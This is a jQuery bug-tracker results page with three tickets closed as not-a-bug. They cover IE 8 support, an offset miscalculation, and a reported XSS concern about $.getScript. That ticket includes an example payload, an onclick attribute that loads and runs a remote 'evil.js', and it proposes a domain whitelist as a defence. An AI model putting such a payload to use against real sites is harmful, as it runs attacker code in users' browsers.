Bug Tracker

Custom Query (13852 matches)


Show under each result:

Results (67 - 69 of 13852)

Ticket Resolution Summary Owner Reporter
#15168 notabug IE 8 not supported by jQuery 2.0.3 jdsharp Prakash Sankar

Currently i am using 2.0.3 jQuery in my project. when i rollback to 1.x series by NuGet package manager console. I am getting the same error...

#15166 notabug $.getScript Function may cause XSS attack lupin

$.getScript and can load JavaScript file from remote server,then execute it.

In some cases,if a attack can control this function or its parameter,this Function may cause XSS attack.

For example,if an attacker can control a HTML TAG (such as input tag).

<input type=text onclick=...>

An attacker can control the OnClick Event,but the web app filter evil characters(<script>,doucment...).In this case XSS can not occur,but if the web page contains JQuery library,the attacker can bypass the Filter Mechanism using $.getScript Function,like this.

<input type=text onclick=$.getScript('http://jquery.com/evil.js')>

The attacker put evil.js on his remote server,this JavaScript File contains evil JavaScript code.When a user click the input tag ,the evil javascript code will execute.

I think JQuery Libiary should add a white list,a web can only load a JavaScript File from current domain by default,if a web need to load a JavaScript File from remote server,the developer have to add the domain into the white list.

#15165 notabug jQuery .offset().top wrong on refresh of page Knecker

When getting .offset().top from an relative positioned element, eg. div, in combination with .scroll, .offset reports wrong value once at a refresh. (Occuring in Firefox 31).

Construction Example:

var test = $("#something").offset().top);



Related stackoverflow thread: http://stackoverflow.com/questions/11649454/jquery-offset-wrong-on-refresh-of-page

Note: See TracQuery for help on using queries.